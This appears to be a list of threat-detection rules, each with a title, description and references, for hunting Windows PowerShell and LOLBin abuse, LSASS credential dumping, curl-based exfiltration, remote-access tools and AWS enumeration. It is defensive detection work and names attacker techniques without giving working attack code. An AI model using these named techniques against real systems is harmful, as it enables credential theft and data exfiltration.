Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host. |
https://learn.microsoft.com/en-us/powershell/module/netsecurity/get-netfirewallrule?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/powershell/module/netsecurity/show-netfirewallrule?view=windowsserver2022-ps |
Compress-Archive Cmdlet Execution |
Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files.
An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md |
Windows Mail App Mailbox Access Via PowerShell Script |
Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails. |
https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1070.008/T1070.008.md |
New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock |
Detects when a PowerShell script contains calls to the "New-NetFirewallRule" cmdlet in order to add a new firewall rule with an "Allow" action.
|
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/ |
SMB over QUIC Via PowerShell Script |
Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments |
https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md, https://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps, https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/ |
Potential Registry Reconnaissance Via PowerShell Script |
Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md |
Use Of Remove-Item to Delete File - ScriptBlock |
Detects the PowerShell "Remove-Item" cmdlet used with "-Path" to delete a file, or a folder when combined with "-Recurse" |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7 |
Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet |
Detects the execution of a PowerShell script with a call to the "Send-MailMessage" cmdlet along with the "-Attachments" flag. This could be a potential sign of data exfiltration via Email.
Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.4, https://www.ietf.org/rfc/rfc2821.txt |
WinAPI Library Calls Via PowerShell Scripts |
Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts. |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
WinAPI Function Calls Via PowerShell Scripts |
Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts. |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Potential Credential Dumping Attempt Via PowerShell |
Detects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
LSASS Access From Program In Potentially Suspicious Folder |
Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder |
https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf |
Uncommon GrantedAccess Flags On LSASS |
Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410 |
https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf |
Potential Shellcode Injection |
Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject. |
https://github.com/EmpireProject/PSInject |
Password Protected Compressed File Extraction Via 7Zip |
Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. |
https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/ |
Set Files as System Files Using Attrib.EXE |
Detects the execution of "attrib" with the "+s" flag to mark files as system files |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib, https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/ |
Potential BOINC Software Execution (UC-Berkeley Signature) |
Detects the use of software that is related to the University of California, Berkeley via metadata information.
This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
|
https://boinc.berkeley.edu/, https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software |
CMD Shell Output Redirect |
Detects the use of the redirection character ">" to redirect information on the command line.
This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
|
https://ss64.com/nt/syntax-redirection.html |
Potential File Override/Append Via SET Command |
Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign.
Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly.
Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt".
The typical use case of the "set /p=" command is to prompt the user for input.
|
https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1, https://ss64.com/nt/set.html |
Headless Process Launched Via Conhost.EXE |
Detects the launch of a child process via "conhost.exe" with the "--headless" flag.
The "--headless" flag hides the window from the user upon execution.
|
https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software |
Dynamic .NET Compilation Via Csc.EXE - Hunting |
Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. |
https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/, https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf, https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/, https://twitter.com/gN3mes1s/status/1206874118282448897 |
File Download Via Curl.EXE |
Detects file download using curl.exe |
https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 |
Curl.EXE Execution |
Detects a curl process start on Windows, which could indicate a file download from a remote location or a simple web request to a remote server |
https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 |
Potential Data Exfiltration Via Curl.EXE |
Detects the execution of the "curl" process with "upload" flags, which might indicate potential data exfiltration |
https://twitter.com/d1r4c/status/1279042657508081664, https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file, https://curl.se/docs/manpage.html |
Diskshadow Child Process Spawned |
Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. |
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow |
Curl.EXE Execution With Custom UserAgent |
Detects execution of curl.exe with custom useragent options |
https://curl.se/docs/manpage.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd |
ClickOnce Deployment Execution - Dfsvc.EXE Child Process |
Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 |
Diskshadow Script Mode Execution |
Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that delete the shadow copies on the system. Investigate the content of the scripts and their location.
|
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow |
Potential Proxy Execution Via Explorer.EXE From Shell Process |
Detects the creation of a child "explorer.exe" process from a shell-like process such as "cmd.exe" or "powershell.exe".
Attackers can use "explorer.exe" to evade defense mechanisms by proxying the execution through it.
While this is often a legitimate action, this rule can be used to hunt for anomalies.
The MuddyWater threat actor was seen using this technique.
|
https://twitter.com/CyberRaiju/status/1273597319322058752, https://app.any.run/tasks/9a8fd563-4c54-4d0a-9ad8-1fe08339cbc3/ |
Potential DLL Sideloading Activity Via ExtExport.EXE |
Detects the execution of "Extexport.exe", a utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa.
It can be abused as a tool to side-load any DLL. If a folder is provided in the command line it will load any DLL with one of the following names: "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll".
Arbitrary DLLs can also be loaded if a specific number of flags is provided.
|
https://lolbas-project.github.io/lolbas/Binaries/Extexport/, https://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/, https://www.microsoft.com/en-us/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/, https://res.armor.com/resources/threat-intelligence/astaroth-banking-trojan/, https://securelist.com/the-tetrade-brazilian-banking-malware/97779/, https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/ |
Potential Password Reconnaissance Via Findstr.EXE |
Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages |
https://steflan-security.com/windows-privilege-escalation-credential-harvesting/, https://adsecurity.org/?p=2288 |
New Self Extracting Package Created Via IExpress.EXE |
Detects the "iexpress.exe" utility creating self-extracting packages.
Attackers were seen leveraging "iexpress" to compile packages on the fly via ".sed" files.
Investigate the command line options provided to "iexpress" and, in case of a ".sed" file, check its contents and legitimacy.
|
https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior |
Microsoft Workflow Compiler Execution |
Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
|
https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/ |
CodePage Modification Via MODE.COM |
Detects a CodePage modification using the "mode.com" utility.
This behavior has been used by threat actors behind Dharma ransomware.
|
https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode, https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html, https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior |
Net.EXE Execution |
Detects execution of "Net.EXE". |
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/, https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html, https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html, https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe |
SMB over QUIC Via Net.EXE |
Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments. |
https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md, https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/ |
Suspicious New Instance Of An Office COM Object |
Detects an svchost process spawning an instance of an Office application. This happens when the initial Word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.
This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
|
https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic, https://github.com/med0x2e/vba2clr |
Import New Module Via PowerShell CommandLine |
Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-5.1 |
Unusually Long PowerShell CommandLine |
Detects unusually long PowerShell command lines with a length of 1000 characters or more |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace |
Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace.
The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
These can be used for example in decrypting malicious payload for defense evasion.
|
https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0, https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html, https://www.virustotal.com/gui/file/39102fb7bb6a74a9c8cb6d46419f9015b381199ea8524c1376672b30fffd69d2 |
New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet |
Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action.
|
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/ |
Potentially Suspicious PowerShell Child Processes |
Detects potentially suspicious child processes spawned by PowerShell.
Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
|
https://twitter.com/ankit_anubhav/status/1518835408502620162 |
Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly |
Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location.
When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'.
|
https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/, https://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection, https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver, https://ss64.com/nt/regsvr32.html |
Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions |
Detects the execution of Action1 in order to execute arbitrary code or establish a remote session.
Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries.
Through the web interface of Action1, the administrator must create a new policy or an app to establish remote execution and then point it at the endpoints where the agent is installed.
Hunting Opportunity 1 - Weed Out The Noise
When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1":
ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0"
After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences.
Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours
If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
|
https://twitter.com/Kostastsale/status/1646256901506605063?s=20, https://www.action1.com/documentation/ |
Remote Access Tool - Ammy Admin Agent Execution |
Detects the execution of the Ammy Admin RMM agent for remote management. |
https://www.ammyy.com/en/admin_features.html |
Remote Access Tool - Cmd.EXE Execution via AnyViewer |
Detects execution of "cmd.exe" via the AnyViewer RMM agent during a remote management session.
|
https://www.anyviewer.com/help/remote-technical-support.html |
Remote Access Tool - ScreenConnect Remote Command Execution - Hunting |
Detects remote binary or command execution via the ScreenConnect Service.
Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
|
https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
DLL Call by Ordinal Via Rundll32.EXE |
Detects calls of DLL exports by ordinal number via rundll32.exe. |
https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/, https://github.com/Neo23x0/DLLRunner, https://twitter.com/cyb3rops/status/1186631731543236608, https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/ |
Rundll32.EXE Calling DllRegisterServer Export Function Explicitly |
Detects when the DLL export function 'DllRegisterServer' is explicitly called in the command line by Rundll32 and the DLL is located in a non-standard path.
|
https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/, https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior, https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver |
Scheduled Task Creation From Potential Suspicious Parent Location |
Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
|
https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/ |
SC.EXE Query Execution |
Detects execution of "sc.exe" to query information about registered services on the system |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery |
Potential CommandLine Obfuscation Using Unicode Characters |
Detects potential CommandLine obfuscation using unicode characters.
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
|
https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http |
Potentially Suspicious Compression Tool Parameters |
Detects potentially suspicious command line arguments of common data compression tools |
https://twitter.com/SBousseaden/status/1184067445612535811 |
Elevated System Shell Spawned |
Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
|
https://github.com/Wh04m1001/SysmonEoP |
EventLog Query Requests By Builtin Utilities |
Detects attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
|
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1, http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil |
Potential Suspicious Execution From GUID Like Folder Names |
Detects potentially suspicious execution from a GUID-like folder name located in a suspicious location such as %TEMP%, as seen being used in IcedID attacks.
Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
|
https://twitter.com/Kostastsale/status/1565257924204986369 |
Execution From Webserver Root Folder |
Detects a program executing from a web server root folder. Use this rule to hunt for potentially interesting activity such as webshells or backdoors.
|
Internal Research |
Tunneling Tool Execution |
Detects the execution of well known tools that can be abused for data exfiltration and tunneling. |
https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ |
File or Folder Permissions Modifications |
Detects a file or folder's permissions being modified or tampered with. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11), https://github.com/swagkarna/Defeat-Defender-V1.2.0 |
Manual Execution of Script Inside of a Compressed File |
This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as the wscript and cscript binaries.
In the query below, the child process is the script interpreter that will execute the script. The script extension is also one of a set of standard extensions that the Windows OS recognizes. Selections 1-3 contain three different execution scenarios:
1. Compressed file opened using 7zip.
2. Compressed file opened using WinRar.
3. Compressed file opened using native Windows File Explorer capabilities.
When the malicious script is double-clicked, it will be extracted to the respective directories as signified by the CommandLine in each of the three Selections. It will then be executed using the relevant script interpreter.
|
https://app.any.run/tasks/25970bb5-f864-4e9e-9e1b-cc8ff9e6386a, https://app.any.run/tasks/fa99cedc-9d2f-4115-a08e-291429ce3692 |
Process Terminated Via Taskkill |
Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity.
Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process, https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/ |
Suspicious Tasklist Discovery Command |
Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist |
System Information Discovery Via Wmic.EXE |
Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS,
and GPU driver products/versions.
|
https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic, https://nwgat.ninja/getting-system-information-with-wmic-on-windows/, https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar, https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/, https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/, https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior |
WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript |
Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript |
https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://redcanary.com/blog/gootloader/ |
Arbitrary Command Execution Using WSL |
Detects potential abuse of the Windows Subsystem for Linux (WSL) binary as a Living off the Land binary in order to execute arbitrary Linux or Windows commands.
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/, https://twitter.com/nas_bench/status/1535431474429808642 |
Cab File Extraction Via Wusa.EXE |
Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract a cab file using the "/extract" argument, which is no longer supported.
|
https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html |
Scheduled Task Created - Registry |
Detects the creation of a scheduled task via Registry keys. |
https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/, https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5 |
Microsoft Office Trusted Location Updated |
Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. |
https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01 |
Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace |
Detects the setting of a registry value under "\Shell\Open\Command" that references PowerShell classes from the "System.Security.Cryptography" namespace.
The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
These can be used for example in decrypting malicious payload for defense evasion.
|
https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0, https://squiblydoo.blog/2023/11/07/october-2023-solarmarker/ |
Command Executed Via Run Dialog Box - Registry |
Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
|
https://www.forensafe.com/blogs/runmrukey.html, https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71, https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/ |
Service Binary in User Controlled Folder |
Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\".
Attackers often use such directories for staging purposes.
This rule might also trigger on badly written software; if an attacker controls the binary of an auto-starting service, they might achieve persistence or privilege escalation.
Note that while ProgramData is a user controlled folder, software might apply strict ACLs which make such folders accessible only to admin users. Remove such folders via filters if you experience a lot of noise.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Shell Context Menu Command Tampering |
Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands. |
https://mrd0x.com/sentinelone-persistence-via-menu-context/ |
AWS EC2 Download Userdata |
Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment. |
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py |
Potential Backup Enumeration on AWS |
Detects potential enumeration activity targeting AWS instance backups |
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ |
Account Enumeration on AWS |
Detects enumeration of account configuration via API calls that list different instances and services within a short period of time. |
None |
Potential Network Enumeration on AWS |
Detects network enumeration performed on AWS. |
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ |
Potential Storage Enumeration on AWS |
Detects potential enumeration activity targeting AWS storage |
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ |
AWS Lambda Function Created or Invoked |
Detects when a user creates or invokes a Lambda function. |
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ |
AWS Macie Evasion |
Detects attempts to evade Macie detection. |
https://docs.aws.amazon.com/cli/latest/reference/macie/ |
Potential AWS Cloud Email Service Abuse |
Detects when the email sending feature is enabled for an AWS account and an email address verification request is dispatched in quick succession. |
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ |
Sign-in Failure Bad Password Threshold |
Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated. |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor |
CVE-2021-3156 Exploitation Attempt |
Detects exploitation attempt of vulnerability described in CVE-2021-3156.
An alternative approach might be to look for flooding of auditd logs due to the brute-forcing
required to trigger the heap-based buffer overflow.
|
https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit |
CVE-2021-3156 Exploitation Attempt Bruteforcing |
